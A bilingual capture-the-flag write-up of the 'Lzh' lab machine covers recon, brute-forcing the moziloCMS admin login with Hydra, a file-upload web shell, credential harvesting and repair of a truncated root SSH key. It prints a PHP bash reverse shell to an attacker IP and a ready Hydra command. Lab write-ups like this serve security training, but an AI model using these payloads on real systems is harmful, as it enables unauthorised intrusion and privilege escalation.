本文记录了 Lzh 靶机的渗透实战过程。首先通过目录扫描获取了网站的 backup.zip 源码备份,确认目标运行 moziloCMS。针对后台由于错误尝试过多导致的前端表单禁用,直接使用 Hydra 绕过前端限制成功爆破出密码 Admin123。登录后利用该 CMS 的后台上传漏洞(上传 .jpg 格式后重命名为 .php) 获取初始 Shell。随后在配置文件中提取出 welcome 用户凭据,并在其目录下找到一把损坏的 root SSH 私钥。通过手动补齐缺失的 openssh-key-v1 标准文件头 Base64 编码 ,成功修复私钥并提权至 root。 This article documents the penetration testing process of the Lzh target machine. First, directory scanning was used to obtain the website's backup.zip source code backup, confirming the target was running moziloCMS. To bypass the frontend form disablement caused by too many failed login attempts, Hydra was directly used to brute-force the password, successfully obtaining "Admin123". After logging in, the CMS's backend upload vulnerability was exploited (uploading a .jpg file and then renaming it to .php) to gain an initial shell. Subsequently, credentials for the "welcome" user were extracted from a configuration file, and a damaged root SSH private key was found in that user's directory. By manually completing the missing standard file header for openssh-key-v1 and Base64 encoding it, the private key was successfully repaired and privilege escalation to root was achieved.
信息收集
# Nmap 7.95 scan initiated Sun Dec 14 06:38:57 2025 as: /usr/lib/nmap/nmap --privileged -sV -v -sC -oN 192.168.110.133 192.168.110.133
Nmap scan report for Lzh.lan (192.168.110.133)
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: VisionX | \xE6\x9C\xAA\xE6\x9D\xA5\xE7\xA7\x91\xE6\x8A\x80\xE8\xA7\xA3\xE5\x86\xB3\xE6\x96\xB9\xE6\xA1\x88
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:D9:88:8A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 14 06:39:09 2025 -- 1 IP address (1 host up) scanned in 12.33 seconds# Dirsearch started Sun Dec 14 06:46:14 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.110.133/
403 280B http://192.168.110.133/.ht_wsr.txt
403 280B http://192.168.110.133/.htaccess_extra
403 280B http://192.168.110.133/.htaccess.orig
403 280B http://192.168.110.133/.htaccess_sc
403 280B http://192.168.110.133/.htaccess_orig
403 280B http://192.168.110.133/.htaccessBAK
403 280B http://192.168.110.133/.htaccess.sample
403 280B http://192.168.110.133/.htaccess.bak1
403 280B http://192.168.110.133/.htaccessOLD2
403 280B http://192.168.110.133/.htaccessOLD
403 280B http://192.168.110.133/.htaccess.save
403 280B http://192.168.110.133/.htm
403 280B http://192.168.110.133/.htpasswd_test
403 280B http://192.168.110.133/.html
403 280B http://192.168.110.133/.httr-oauth
403 280B http://192.168.110.133/.htpasswds
403 280B http://192.168.110.133/.php
200 3MB http://192.168.110.133/backup.zip
403 280B http://192.168.110.133/server-status/
403 280B http://192.168.110.133/server-status漏洞分析
发现backup.zip,是一个备份网站。其中显露出moziloCMS3.0-3.0.1,其漏洞在此
1. 以管理员身份登录
2. 通过左侧菜单进入“文件”会话
3. 创建一个包含 PHP Web Shell 内容的 .jpg 文件
4. 通过上传图标将文件上传到服务器并保存
5. 在 Web 服务器上将文件重命名为 .php 并保存
6. 通过以下端点访问 Web Shell:
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php先转到mozilocms目录
http://192.168.110.133/mozilo/ # 主目录
http://192.168.110.133/mozilo/admin/ # admin登陆页面
# 输入次数多了会出现
Access to mozilo Admin is temporarily blocked.
Incorrect access data has been entered too often. # 输入太多错误访问数据,此时不能输入// Logindaten überprüfen
// 初始化hash
function checkLoginData($user, $pass) {
global $loginpassword;
require_once(BASE_DIR_CMS.'PasswordHash.php');
$t_hasher = new PasswordHash(8, FALSE);
//检查管理员账号
if(($user == $loginpassword->get("name")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("pw")))) {
return true;
} elseif((strlen($loginpassword->get("username")) > 4) and ($user == $loginpassword->get("username")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("userpw")))) {
return true; //检查备用账号
} else {
return false; //登陆失败返回false
}
}前端限制不能输入
<input name="login" id="loginbtn" value="Login" class="mo-login_submit button" type="submit" disabled="">所以可以暴力破解
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.110.133 http-post-form "/mozilo/admin/index.php:username=admin&password=^PASS^&login=Login:S=302" -t 64 -I得到admin:Admin123进入后台
利用
<?php
exec("bash -c 'bash -i >& /dev/tcp/192.168.110.141/4444 0>&1'");
?>准备payload
根据描述即可获取shell,枚举用户—>welcome
www-data@Lzh:/var/www$ grep -r 'welcome' . 2>/dev/null
./html/mozilo/admin/config.php: // welcome:3e73d572ba005bb3c02107b2e2fc16f8
./html/mozilo/gpl.txt: This is free software, and you are welcome to redistribute it权限提升
在welcome主目录中发现一个id_rsa是属于root的。
但是缺少前三位,这是一个openssh格式的私钥,开头是固定:openssh-key-v1\0
welcome@Lzh:~$ echo -n 'openssh-key-v1' | base64
b3BlbnNzaC1rZXktdjE=可以进入root了
经验教训
没有仔细阅读注册的源代码,不知道密码政策
Information Gathering
# Nmap 7.95 scan started Sun Dec 14 06:38:57 2025 as: /usr/lib/nmap/nmap --privileged -sV -v -sC -oN 192.168.110.133 192.168.110.133
Nmap scan report for Lzh.lan (192.168.110.133)
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: VisionX | \xE6\x9C\xAA\xE6\x9D\xA5\xE7\xA7\x91\xE6\x8A\x80\xE8\xA7\xA3\xE5\x86\xB3\xE6\x96\xB9\xE6\xA1\x88
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:D9:88:8A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 14 06:39:09 2025 -- 1 IP address (1 host up) scanned in 12.33 seconds# Dirsearch started Sun Dec 14 06:46:14 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.110.133/
403 280B http://192.168.110.133/.ht_wsr.txt
403 280B http://192.168.110.133/.htaccess_extra
403 280B http://192.168.110.133/.htaccess.orig
403 280B http://192.168.110.133/.htaccess_sc
403 280B http://192.168.110.133/.htaccess_orig
403 280B http://192.168.110.133/.htaccessBAK
403 280B http://192.168.110.133/.htaccess.sample
403 280B http://192.168.110.133/.htaccess.bak1
403 280B http://192.168.110.133/.htaccessOLD2
403 280B http://192.168.110.133/.htaccessOLD
403 280B http://192.168.110.133/.htaccess.save
403 280B http://192.168.110.133/.htm
403 280B http://192.168.110.133/.htpasswd_test
403 280B http://192.168.110.133/.html
403 280B http://192.168.110.133/.httr-oauth
403 280B http://192.168.110.133/.htpasswds
403 280B http://192.168.110.133/.php
200 3MB http://192.168.110.133/backup.zip
403 280B http://192.168.110.133/server-status/
403 280B http://192.168.110.133/server-statusVulnerability Analysis
Discovered backup.zip, which is a website backup. It reveals moziloCMS 3.0-3.0.1, whose vulnerability is documented here.
1. Log in as an administrator
2. Access the "Files" section via the left menu
3. Create a .jpg file containing PHP Web Shell content
4. Upload the file to the server via the upload icon and save it
5. Rename the file to .php on the web server and save
6. Access the Web Shell via the following endpoint:
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.phpFirst navigate to the mozilocms directory
http://192.168.110.133/mozilo/ # Main directory
http://192.168.110.133/mozilo/admin/ # Admin login page
# After too many attempts, the following appears:
Access to mozilo Admin is temporarily blocked.
Incorrect access data has been entered too often. # Too many incorrect access entries, input is now blocked// Check login data
// Initialize hash
function checkLoginData($user, $pass) {
global $loginpassword;
require_once(BASE_DIR_CMS.'PasswordHash.php');
$t_hasher = new PasswordHash(8, FALSE);
// Check admin account
if(($user == $loginpassword->get("name")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("pw")))) {
return true;
} elseif((strlen($loginpassword->get("username")) > 4) and ($user == $loginpassword->get("username")) and (true === $t_hasher->CheckPassword($pass, $loginpassword->get("userpw")))) {
return true; // Check backup account
} else {
return false; // Login failure returns false
}
}Frontend restriction prevents input
<input name="login" id="loginbtn" value="Login" class="mo-login_submit button" type="submit" disabled="">Therefore, brute-forcing is possible
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.110.133 http-post-form "/mozilo/admin/index.php:username=admin&password=^PASS^&login=Login:S=302" -t 64 -IObtained admin:Admin123 to enter the backend
Exploitation
<?php
exec("bash -c 'bash -i >& /dev/tcp/192.168.110.141/4444 0>&1'");
?>Prepare payload
According to the description, obtain shell, enumerate users -> welcome
www-data@Lzh:/var/www$ grep -r 'welcome' . 2>/dev/null
./html/mozilo/admin/config.php: // welcome:3e73d572ba005bb3c02107b2e2fc16f8
./html/mozilo/gpl.txt: This is free software, and you are welcome to redistribute itPrivilege Escalation
In the welcome home directory, discovered an id_rsa that belongs to root.
But the first three characters are missing. This is an OpenSSH format private key, the header is fixed: openssh-key-v1\0
welcome@Lzh:~$ echo -n 'openssh-key-v1' | base64
b3BlbnNzaC1rZXktdjE=Can now escalate to root
Lessons Learned
Did not carefully review the registered source code, unaware of the password policy